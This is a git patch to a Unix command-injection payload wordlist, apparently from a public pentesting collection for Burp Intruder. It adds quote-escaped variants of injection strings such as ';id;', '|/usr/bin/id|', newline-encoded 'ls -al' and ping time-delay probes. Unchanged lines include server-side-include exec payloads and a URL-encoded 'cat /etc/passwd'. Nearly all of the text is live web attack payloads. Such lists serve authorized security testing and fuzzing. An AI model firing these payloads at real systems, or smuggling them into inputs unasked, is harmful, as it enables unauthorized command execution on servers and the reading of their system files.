From aabb48125f7c501cb9138e7adf92a6036a9466dd Mon Sep 17 00:00:00 2001 From: ksg Date: Fri, 17 Jan 2020 10:41:12 +0900 Subject: [PATCH] Add escaped double or single quote cases --- .../Intruder/command-execution-unix.txt | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/Command Injection/Intruder/command-execution-unix.txt b/Command Injection/Intruder/command-execution-unix.txt index 3437f99..30d957a 100644 --- a/Command Injection/Intruder/command-execution-unix.txt +++ b/Command Injection/Intruder/command-execution-unix.txt @@ -3,19 +3,28 @@ <!--#exec%20cmd="/usr/bin/id;--> <!--#exec%20cmd="/usr/bin/id;--> /index.html|id| +";id;" +';id;' ;id; ;id ;netstat -a; -;id; +"|id|" +'|id|' |id |/usr/bin/id |id| +"|/usr/bin/id|" +'|/usr/bin/id|' |/usr/bin/id| +"||/usr/bin/id|" +'||/usr/bin/id|' ||/usr/bin/id| |id; ||/usr/bin/id; ;id| ;|/usr/bin/id| +"\n/bin/ls -al\n" +'\n/bin/ls -al\n' \n/bin/ls -al\n \n/usr/bin/id\n \nid\n @@ -56,8 +65,12 @@ a|/usr/bin/id %0Acat%20/etc/passwd %0A/usr/bin/id %0Aid +%22%0A/usr/bin/id%0A%22 +%27%0A/usr/bin/id%0A%27 %0A/usr/bin/id%0A %0Aid%0A +"& ping -i 30 127.0.0.1 &" +'& ping -i 30 127.0.0.1 &' & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & %0a ping -i 30 127.0.0.1 %0a